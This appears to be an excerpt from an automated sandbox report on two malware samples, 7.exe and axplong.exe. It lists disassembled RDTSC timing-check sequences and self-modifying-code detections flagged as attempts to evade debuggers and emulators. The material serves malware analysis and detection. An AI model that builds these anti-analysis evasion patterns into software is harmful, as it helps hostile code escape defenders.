Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55B00BF second address: 55B00D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDB98EABA32h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55B00D5 second address: 55B0137 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FDB98EAF3CDh 0x00000010 sub esi, 603BED96h 0x00000016 jmp 00007FDB98EAF3D1h 0x0000001b popfd 0x0000001c mov cx, 6A07h 0x00000020 popad 0x00000021 xchg eax, ebx 0x00000022 jmp 00007FDB98EAF3CAh 0x00000027 push eax 0x00000028 jmp 00007FDB98EAF3CBh 0x0000002d xchg eax, ebx 0x0000002e pushad 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FDB98EAF3D2h 0x00000036 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55B0137 second address: 55B0144 instructions: 0x00000000 rdtsc 0x00000002 mov ax, 5A71h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a mov bx, si 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55B0144 second address: 55B0237 instructions: 0x00000000 rdtsc 0x00000002 mov ah, 5Bh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ebx, dword ptr [ebp+10h] 0x0000000a jmp 00007FDB98EAF3CBh 0x0000000f xchg eax, esi 0x00000010 pushad 0x00000011 mov esi, 087C1FDBh 0x00000016 pushad 0x00000017 mov cx, 858Dh 0x0000001b push eax 0x0000001c pop ebx 0x0000001d popad 0x0000001e popad 0x0000001f push eax 0x00000020 jmp 00007FDB98EAF3CFh 0x00000025 xchg eax, esi 0x00000026 jmp 00007FDB98EAF3D6h 0x0000002b mov esi, dword ptr [ebp+08h] 0x0000002e pushad 0x0000002f pushfd 0x00000030 jmp 00007FDB98EAF3CEh 0x00000035 add ch, 00000038h 0x00000038 jmp 00007FDB98EAF3CBh 0x0000003d popfd 0x0000003e popad 0x0000003f push ebp 0x00000040 jmp 00007FDB98EAF3D2h 0x00000045 mov dword ptr [esp], edi 0x00000048 jmp 00007FDB98EAF3D0h 0x0000004d test esi, esi 0x0000004f jmp 00007FDB98EAF3D0h 0x00000054 je 00007FDC0B08D7F0h 0x0000005a jmp 00007FDB98EAF3D0h 0x0000005f cmp dword ptr [esi+08h], DDEEDDEEh 0x00000066 jmp 00007FDB98EAF3D0h 0x0000006b je 00007FDC0B08D7D9h 0x00000071 push eax 0x00000072 push edx 0x00000073 jmp 00007FDB98EAF3D7h 0x00000078 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55B0237 second address: 55B023C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55B023C second address: 55B028B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FDB98EAF3D5h 0x0000000a add eax, 24118CA6h 0x00000010 jmp 00007FDB98EAF3D1h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov edx, dword ptr [esi+44h] 0x0000001c jmp 00007FDB98EAF3CEh 0x00000021 or edx, dword ptr [ebp+0Ch] 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 mov ch, 65h 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55B028B second address: 55B02CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FDB98EABA30h 0x00000009 sub eax, 711244A8h 0x0000000f jmp 00007FDB98EABA2Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 test edx, 61000000h 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FDB98EABA31h 0x00000025 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55B02CD second address: 55B02D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55B02D3 second address: 55B02D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55B02D7 second address: 55B02F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDB98EAF3D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007FDC0B08D75Eh 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55B02F9 second address: 55B02FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55B02FD second address: 55B032D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 test byte ptr [esi+48h], 00000001h 0x0000000b pushad 0x0000000c mov esi, 1F57AE75h 0x00000011 movzx eax, di 0x00000014 popad 0x00000015 jne 00007FDC0B08D755h 0x0000001b jmp 00007FDB98EAF3CDh 0x00000020 test bl, 00000007h 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 push esi 0x00000027 pop edx 0x00000028 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55A09C4 second address: 55A0A26 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, di 0x00000006 mov si, di 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esp 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FDB98EABA2Ch 0x00000014 and ecx, 656D39C8h 0x0000001a jmp 00007FDB98EABA2Bh 0x0000001f popfd 0x00000020 mov di, cx 0x00000023 popad 0x00000024 mov dword ptr [esp], ebp 0x00000027 pushad 0x00000028 mov ecx, 40B4EB37h 0x0000002d jmp 00007FDB98EABA2Ch 0x00000032 popad 0x00000033 mov ebp, esp 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007FDB98EABA37h 0x0000003c rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55A0A26 second address: 55A0A5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDB98EAF3D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and esp, FFFFFFF8h 0x0000000c jmp 00007FDB98EAF3CEh 0x00000011 xchg eax, ebx 0x00000012 pushad 0x00000013 movzx ecx, dx 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55A0A5C second address: 55A0AB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDB98EABA2Fh 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007FDB98EABA39h 0x00000011 xchg eax, ebx 0x00000012 jmp 00007FDB98EABA2Eh 0x00000017 xchg eax, esi 0x00000018 jmp 00007FDB98EABA30h 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55A0AB2 second address: 55A0AB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55A0AB6 second address: 55A0ABA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55A0ABA second address: 55A0AC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55A0AC0 second address: 55A0AC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55A0AC5 second address: 55A0ADB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FDB98EAF3CAh 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55A0ADB second address: 55A0AE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55A0AE1 second address: 55A0AE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55A0AE5 second address: 55A0B32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [ebp+08h] 0x0000000b pushad 0x0000000c movsx ebx, si 0x0000000f mov cx, 5367h 0x00000013 popad 0x00000014 sub ebx, ebx 0x00000016 jmp 00007FDB98EABA33h 0x0000001b test esi, esi 0x0000001d jmp 00007FDB98EABA36h 0x00000022 je 00007FDC0B09128Eh 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55A0B32 second address: 55A0B38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55A0B38 second address: 55A0B76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FDB98EABA32h 0x00000009 sub ecx, 27AB9258h 0x0000000f jmp 00007FDB98EABA2Bh 0x00000014 popfd 0x00000015 mov ah, 1Bh 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a cmp dword ptr [esi+08h], DDEEDDEEh 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 movzx ecx, dx 0x00000027 mov cx, dx 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55A0B76 second address: 55A0C08 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDB98EAF3D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, esi 0x0000000b jmp 00007FDB98EAF3D0h 0x00000010 je 00007FDC0B094BCBh 0x00000016 jmp 00007FDB98EAF3D0h 0x0000001b test byte ptr [77816968h], 00000002h 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007FDB98EAF3CEh 0x00000029 adc cx, 4178h 0x0000002e jmp 00007FDB98EAF3CBh 0x00000033 popfd 0x00000034 push ecx 0x00000035 jmp 00007FDB98EAF3CFh 0x0000003a pop ecx 0x0000003b popad 0x0000003c jne 00007FDC0B094B8Eh 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007FDB98EAF3D2h 0x00000049 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55A0C08 second address: 55A0C0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55A0CFC second address: 55A0D9E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDB98EAF3D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a pushad 0x0000000b mov ecx, 4C0E9533h 0x00000010 mov ecx, 0893518Fh 0x00000015 popad 0x00000016 pop ebx 0x00000017 pushad 0x00000018 call 00007FDB98EAF3D0h 0x0000001d mov cx, 9D11h 0x00000021 pop eax 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007FDB98EAF3CDh 0x00000029 adc cl, 00000026h 0x0000002c jmp 00007FDB98EAF3D1h 0x00000031 popfd 0x00000032 pushfd 0x00000033 jmp 00007FDB98EAF3D0h 0x00000038 adc si, 32C8h 0x0000003d jmp 00007FDB98EAF3CBh 0x00000042 popfd 0x00000043 popad 0x00000044 popad 0x00000045 mov esp, ebp 0x00000047 push eax 0x00000048 push edx 0x00000049 jmp 00007FDB98EAF3D5h 0x0000004e rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E5EC29 second address: E5EC71 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FDB98EABA26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FDB98EABA32h 0x00000010 jmp 00007FDB98EABA2Dh 0x00000015 popad 0x00000016 popad 0x00000017 push eax 0x00000018 pushad 0x00000019 jmp 00007FDB98EABA37h 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55B0BF0 second address: 55B0C0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FDB98EAF3D5h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55B0A22 second address: 55B0A30 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDB98EABA2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 563069E second address: 56306D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FDB98EAF3D9h 0x0000000a and ah, FFFFFFF6h 0x0000000d jmp 00007FDB98EAF3D1h 0x00000012 popfd 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 56306D2 second address: 56306D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 56306D8 second address: 56306DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 56306DC second address: 5630777 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FDB98EABA36h 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FDB98EABA2Eh 0x00000016 jmp 00007FDB98EABA35h 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007FDB98EABA30h 0x00000022 sub si, 6DD8h 0x00000027 jmp 00007FDB98EABA2Bh 0x0000002c popfd 0x0000002d popad 0x0000002e mov ebp, esp 0x00000030 jmp 00007FDB98EABA36h 0x00000035 pop ebp 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FDB98EABA37h 0x0000003d rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 56208E6 second address: 5620960 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FDB98EAF3D6h 0x00000009 or eax, 1711DD48h 0x0000000f jmp 00007FDB98EAF3CBh 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007FDB98EAF3D8h 0x0000001b add ecx, 44659FA8h 0x00000021 jmp 00007FDB98EAF3CBh 0x00000026 popfd 0x00000027 popad 0x00000028 pop edx 0x00000029 pop eax 0x0000002a xchg eax, ebp 0x0000002b pushad 0x0000002c mov edi, eax 0x0000002e call 00007FDB98EAF3D0h 0x00000033 mov si, 4DA1h 0x00000037 pop ecx 0x00000038 popad 0x00000039 push eax 0x0000003a pushad 0x0000003b push eax 0x0000003c push edx 0x0000003d mov ebx, ecx 0x0000003f rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 5620960 second address: 562099A instructions: 0x00000000 rdtsc 0x00000002 call 00007FDB98EABA34h 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov edi, 28B72526h 0x0000000f popad 0x00000010 xchg eax, ebp 0x00000011 pushad 0x00000012 mov bx, B2FEh 0x00000016 mov di, 010Ah 0x0000001a popad 0x0000001b mov ebp, esp 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FDB98EABA2Ch 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 562099A second address: 56209A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55B0E0A second address: 55B0E1B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDB98EABA2Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55B0E1B second address: 55B0E2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDB98EAF3CCh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55B0E2B second address: 55B0E43 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDB98EABA2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55B0E43 second address: 55B0E47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55B0E47 second address: 55B0E4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55B0E4D second address: 55B0E53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55B0E53 second address: 55B0E57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55B0E57 second address: 55B0E78 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDB98EAF3D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55B0E78 second address: 55B0E7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55B0E7E second address: 55B0EBA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 15B0ADE8h 0x00000008 pushfd 0x00000009 jmp 00007FDB98EAF3D1h 0x0000000e add esi, 20935956h 0x00000014 jmp 00007FDB98EAF3D1h 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d xchg eax, ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55B0EBA second address: 55B0ECD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDB98EABA2Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 5620B7D second address: 5620B96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDB98EAF3CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov bh, B8h 0x0000000f mov bx, si 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 5620B96 second address: 5620BF5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FDB98EABA2Fh 0x00000008 pushfd 0x00000009 jmp 00007FDB98EABA38h 0x0000000e and si, 3338h 0x00000013 jmp 00007FDB98EABA2Bh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov ebp, esp 0x0000001e pushad 0x0000001f push esi 0x00000020 jmp 00007FDB98EABA2Bh 0x00000025 pop ecx 0x00000026 push edx 0x00000027 mov ecx, 0C8BAB7Bh 0x0000002c pop esi 0x0000002d popad 0x0000002e push dword ptr [ebp+0Ch] 0x00000031 pushad 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 5620BF5 second address: 5620BF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	RDTSC instruction interceptor: First address: 71F2FC second address: 71EBE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 jbe 00007FDB98EABA2Ah 0x0000000d push edi 0x0000000e push edi 0x0000000f pop edi 0x00000010 pop edi 0x00000011 nop 0x00000012 sub dword ptr [ebp+122D1A4Fh], ecx 0x00000018 push dword ptr [ebp+122D0585h] 0x0000001e cld 0x0000001f xor dword ptr [ebp+122D30E2h], esi 0x00000025 call dword ptr [ebp+122D30D1h] 0x0000002b pushad 0x0000002c mov dword ptr [ebp+122D30C7h], ecx 0x00000032 xor eax, eax 0x00000034 clc 0x00000035 mov edx, dword ptr [esp+28h] 0x00000039 jl 00007FDB98EABA27h 0x0000003f cmc 0x00000040 mov dword ptr [ebp+122D2C75h], eax 0x00000046 stc 0x00000047 mov esi, 0000003Ch 0x0000004c cmc 0x0000004d mov dword ptr [ebp+122D30C7h], ecx 0x00000053 add esi, dword ptr [esp+24h] 0x00000057 jmp 00007FDB98EABA30h 0x0000005c lodsw 0x0000005e jne 00007FDB98EABA2Ch 0x00000064 add eax, dword ptr [esp+24h] 0x00000068 jmp 00007FDB98EABA31h 0x0000006d mov ebx, dword ptr [esp+24h] 0x00000071 pushad 0x00000072 jns 00007FDB98EABA2Ch 0x00000078 mov dword ptr [ebp+122D27D6h], ebx 0x0000007e popad 0x0000007f nop 0x00000080 jmp 00007FDB98EABA2Dh 0x00000085 push eax 0x00000086 pushad 0x00000087 jc 00007FDB98EABA2Ch 0x0000008d push eax 0x0000008e push edx 0x0000008f rdtsc
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	RDTSC instruction interceptor: First address: 889BDE second address: 889BE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	RDTSC instruction interceptor: First address: 889BE2 second address: 889BE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	RDTSC instruction interceptor: First address: 889BE6 second address: 889BF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	RDTSC instruction interceptor: First address: 889BF0 second address: 889C0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDB98EABA38h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	RDTSC instruction interceptor: First address: 889C0C second address: 889C10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	RDTSC instruction interceptor: First address: 889212 second address: 889221 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jnp 00007FDB98EABA26h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	RDTSC instruction interceptor: First address: 8893AD second address: 8893C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDB98EAF3D7h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	RDTSC instruction interceptor: First address: 88D1C6 second address: 88D22C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 xor dword ptr [esp], 4063D733h 0x0000000d pushad 0x0000000e mov dword ptr [ebp+122D2824h], edx 0x00000014 mov ecx, 15B87FE4h 0x00000019 popad 0x0000001a lea ebx, dword ptr [ebp+12442002h] 0x00000020 push 00000000h 0x00000022 push ecx 0x00000023 call 00007FDB98EABA28h 0x00000028 pop ecx 0x00000029 mov dword ptr [esp+04h], ecx 0x0000002d add dword ptr [esp+04h], 0000001Ch 0x00000035 inc ecx 0x00000036 push ecx 0x00000037 ret 0x00000038 pop ecx 0x00000039 ret 0x0000003a mov dword ptr [ebp+122D37FDh], edi 0x00000040 push eax 0x00000041 pushad 0x00000042 push ebx 0x00000043 jmp 00007FDB98EABA34h 0x00000048 pop ebx 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	RDTSC instruction interceptor: First address: 88D22C second address: 88D230 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\AppData\Local\Temp\7.exe	Special instruction interceptor: First address: CBEB59 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\7.exe	Special instruction interceptor: First address: CBEC27 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\7.exe	Special instruction interceptor: First address: E4F7C0 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\7.exe	Special instruction interceptor: First address: CBEB5F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\7.exe	Special instruction interceptor: First address: EDDBF9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Special instruction interceptor: First address: 71EB59 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Special instruction interceptor: First address: 71EC27 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Special instruction interceptor: First address: 8AF7C0 instructions caused by: Self-modifying code
